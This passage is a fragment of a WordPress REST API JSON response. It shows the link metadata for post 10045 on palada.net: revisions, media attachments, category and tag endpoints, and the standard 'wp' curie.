count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/10045\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=10045"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=10045"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=10045"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}